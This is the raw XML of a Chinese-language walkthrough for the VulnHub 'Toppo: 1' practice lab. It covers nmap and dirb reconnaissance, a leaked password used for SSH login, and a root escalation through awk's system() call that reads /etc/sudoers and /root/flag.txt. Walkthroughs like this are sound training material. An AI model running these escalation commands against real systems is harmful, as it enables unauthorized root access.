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27CF" w14:textId="08BD0ED2" w:rsidR="006D287F" w:rsidRDefault="00157816" w:rsidP="00157816">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x00:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE42BD" w14:textId="2BEB76CE" w:rsidR="00157816" w:rsidRDefault="00157816">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="00157816">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00DF4809">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/toppo-1,245/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03397D0E" w14:textId="73738B1E" w:rsidR="00157816" w:rsidRDefault="00157816">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看了一下描述比较适合入门</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104FB727" w14:textId="32ACEC58" w:rsidR="00157816" w:rsidRDefault="00157816">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54CE124E" wp14:editId="5B7829E1">
            <wp:extent cx="5274310" cy="1466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BBEB" w14:textId="286008FD" w:rsidR="00157816" w:rsidRDefault="00157816"/>
    <w:p w14:paraId="168815D7" w14:textId="1F757047" w:rsidR="005A1462" w:rsidRDefault="005A1462" w:rsidP="005A1462">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x01:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77610EC2" w14:textId="4BA9D664" w:rsidR="005A1462" w:rsidRDefault="005A1462" w:rsidP="005A1462">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这次启动靶机以后会弹出它的I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92A061" w14:textId="362AB466" w:rsidR="005A1462" w:rsidRDefault="005A1462" w:rsidP="005A1462">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD3C97E" wp14:editId="7413C99E">
            <wp:extent cx="5080261" cy="381019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8C97" w14:textId="2CF262A5" w:rsidR="005A1462" w:rsidRDefault="005A1462" w:rsidP="005A1462"/>
    <w:p w14:paraId="69BF29A8" w14:textId="27475590" w:rsidR="005A1462" w:rsidRDefault="005A1462" w:rsidP="005A1462">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用浏览器输入一下，返回页面正常可以确认是靶机I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA4482" w14:textId="393C49DD" w:rsidR="005A1462" w:rsidRDefault="005A1462" w:rsidP="005A1462">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7227C2A4" wp14:editId="3754548C">
            <wp:extent cx="5274310" cy="1916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764E" w14:textId="68EFC73E" w:rsidR="005A1462" w:rsidRDefault="005A1462" w:rsidP="005A1462"/>
    <w:p w14:paraId="51BB8325" w14:textId="514D9C62" w:rsidR="005A1462" w:rsidRDefault="005A1462" w:rsidP="005A1462">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始用n</w:t>
      </w:r>
      <w:r>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测一下端口</w:t>
      </w:r>
      <w:r w:rsidR="009C6F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,开了22，80，111和36969端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515F797" w14:textId="40C1DADE" w:rsidR="005A1462" w:rsidRDefault="009C6F53" w:rsidP="005A1462">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A -sS -sV -v -p- 192.168.184.164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB4B4C" w14:textId="015C7437" w:rsidR="009C6F53" w:rsidRDefault="009C6F53" w:rsidP="005A1462">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78379E8E" wp14:editId="62491267">
            <wp:extent cx="3905451" cy="25909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84DA" w14:textId="67547E72" w:rsidR="009C6F53" w:rsidRDefault="009C6F53" w:rsidP="009C6F53">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0x02:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挖掘信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F83C92F" w14:textId="3A854E99" w:rsidR="009C6F53" w:rsidRDefault="009C6F53" w:rsidP="009C6F53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始用d</w:t>
      </w:r>
      <w:r>
        <w:t>irb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫目录，扫到很多东西，先跟进/</w:t>
      </w:r>
      <w:r>
        <w:t>admin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181827B" w14:textId="27250CDD" w:rsidR="009C6F53" w:rsidRDefault="009C6F53" w:rsidP="009C6F53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="153798FF" wp14:editId="01E9CCA5">
            <wp:extent cx="3829247" cy="233692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C5A8" w14:textId="104FE773" w:rsidR="009C6F53" w:rsidRDefault="009C6F53" w:rsidP="009C6F53">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下有个Note</w:t>
      </w:r>
      <w:r>
        <w:t>s.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646ED29C" w14:textId="288B1AF9" w:rsidR="009C6F53" w:rsidRDefault="009C6F53" w:rsidP="009C6F53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06055231" wp14:editId="6DA33D94">
            <wp:extent cx="5274310" cy="8947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8A3C" w14:textId="59422073" w:rsidR="00600B50" w:rsidRDefault="00600B50" w:rsidP="009C6F53"/>
    <w:p w14:paraId="58E3B0F8" w14:textId="03A363B3" w:rsidR="00600B50" w:rsidRDefault="00600B50" w:rsidP="009C6F53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有个信息p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">assword :12345ted123 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>划重点，而且刚才开了22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，用户名从密码信息中知道可能是t</w:t>
      </w:r>
      <w:r>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，尝试一下，成功连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E346A3F" w14:textId="42498288" w:rsidR="00600B50" w:rsidRDefault="00600B50" w:rsidP="009C6F53">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF6F302" wp14:editId="4521F1E4">
            <wp:extent cx="4476980" cy="1632034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78EB" w14:textId="0EFA9937" w:rsidR="00600B50" w:rsidRDefault="00600B50" w:rsidP="009C6F53"/>
    <w:p w14:paraId="3ED492BF" w14:textId="0168EAA3" w:rsidR="00600B50" w:rsidRDefault="00600B50" w:rsidP="00600B50">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x03:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE1D12" w14:textId="0FE30088" w:rsidR="00600B50" w:rsidRDefault="00C6521F" w:rsidP="00600B50">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>首先使用s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>udo -l,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>发现用不了，用c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>at /etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>发现t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>目前可以已root权限运行/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>usr/bin/awk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76538BCB" w14:textId="60032BC3" w:rsidR="00C6521F" w:rsidRDefault="00C6521F" w:rsidP="00600B50">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EF81396" wp14:editId="1CE6E59A">
            <wp:extent cx="2355971" cy="520727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B460" w14:textId="06BEAD3B" w:rsidR="00727077" w:rsidRDefault="00727077" w:rsidP="00600B50"/>
    <w:p w14:paraId="541B35CF" w14:textId="77777777" w:rsidR="00CC04D2" w:rsidRDefault="00CC04D2" w:rsidP="00600B50"/>
    <w:p w14:paraId="29509D64" w14:textId="77777777" w:rsidR="00CC04D2" w:rsidRDefault="00CC04D2" w:rsidP="00600B50"/>
    <w:p w14:paraId="5C0868B4" w14:textId="0A1E3D40" w:rsidR="00727077" w:rsidRDefault="00727077" w:rsidP="00600B50">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的提权我参考了下这篇文章</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00DF4809">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.hacknos.com/awk-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然这里要去掉s</w:t>
      </w:r>
      <w:r>
        <w:t>udo</w:t>
      </w:r>
      <w:r w:rsidR="00CC04D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，同时不知道为啥进入不了shell但是可以替换里面的指令</w:t>
      </w:r>
      <w:r w:rsidR="00CC04D2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CC04D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来读取到最后的flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45206F15" w14:textId="7D62E4ED" w:rsidR="00525B75" w:rsidRDefault="00525B75" w:rsidP="00600B50">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r w:rsidRPr="00525B75">
        <w:t xml:space="preserve"> awk 'BEGIN{system("whoam</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00525B75">
        <w:t>")}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F55933" w14:textId="68F9ED2F" w:rsidR="00525B75" w:rsidRDefault="00525B75" w:rsidP="00600B50">
      <w:r w:rsidRPr="00525B75">
        <w:t>awk 'BEGIN{system("</w:t>
      </w:r>
      <w:r>
        <w:t>ls /root</w:t>
      </w:r>
      <w:r w:rsidRPr="00525B75">
        <w:t>")}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570D2194" w14:textId="1322E11C" w:rsidR="00525B75" w:rsidRPr="00525B75" w:rsidRDefault="00525B75" w:rsidP="00600B50">
      <w:r w:rsidRPr="00525B75">
        <w:t>awk 'BEGIN{system("</w:t>
      </w:r>
      <w:r>
        <w:t>cat /root/flag.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00525B75">
        <w:t>")}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA37297" w14:textId="181DCC04" w:rsidR="00727077" w:rsidRPr="00600B50" w:rsidRDefault="00CC04D2" w:rsidP="00600B50">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A286689" wp14:editId="54022E31">
            <wp:extent cx="4584936" cy="349903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077" w:rsidRPr="0060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77644" w14:textId="77777777" w:rsidR="001C2272" w:rsidRDefault="001C2272" w:rsidP="00157816">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2013F867" w14:textId="77777777" w:rsidR="001C2272" w:rsidRDefault="001C2272" w:rsidP="00157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D6E92" w14:textId="77777777" w:rsidR="001C2272" w:rsidRDefault="001C2272" w:rsidP="00157816">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="67FFF7BE" w14:textId="77777777" w:rsidR="001C2272" w:rsidRDefault="001C2272" w:rsidP="00157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23"/>
    <w:rsid w:val="000B5F9B"/>
    <w:rsid w:val="00157816"/>
    <w:rsid w:val="001C2272"/>
    <w:rsid w:val="002F0223"/>
    <w:rsid w:val="00525B75"/>
    <w:rsid w:val="005A1462"/>
    <w:rsid w:val="00600B50"/>
    <w:rsid w:val="00634D8F"/>
    <w:rsid w:val="006D287F"/>
    <w:rsid w:val="00727077"/>
    <w:rsid w:val="009C6F53"/>
    <w:rsid w:val="00C6521F"/>
    <w:rsid w:val="00CC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4A62A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FFC8468C-1E67-4C68-A5CF-E4074DD5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78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8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8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5781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1578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57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vulnhub.com/entry/toppo-1,245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www.hacknos.com/awk-privilege-escalation/" TargetMode="Externa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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-01T08:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-01T11:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>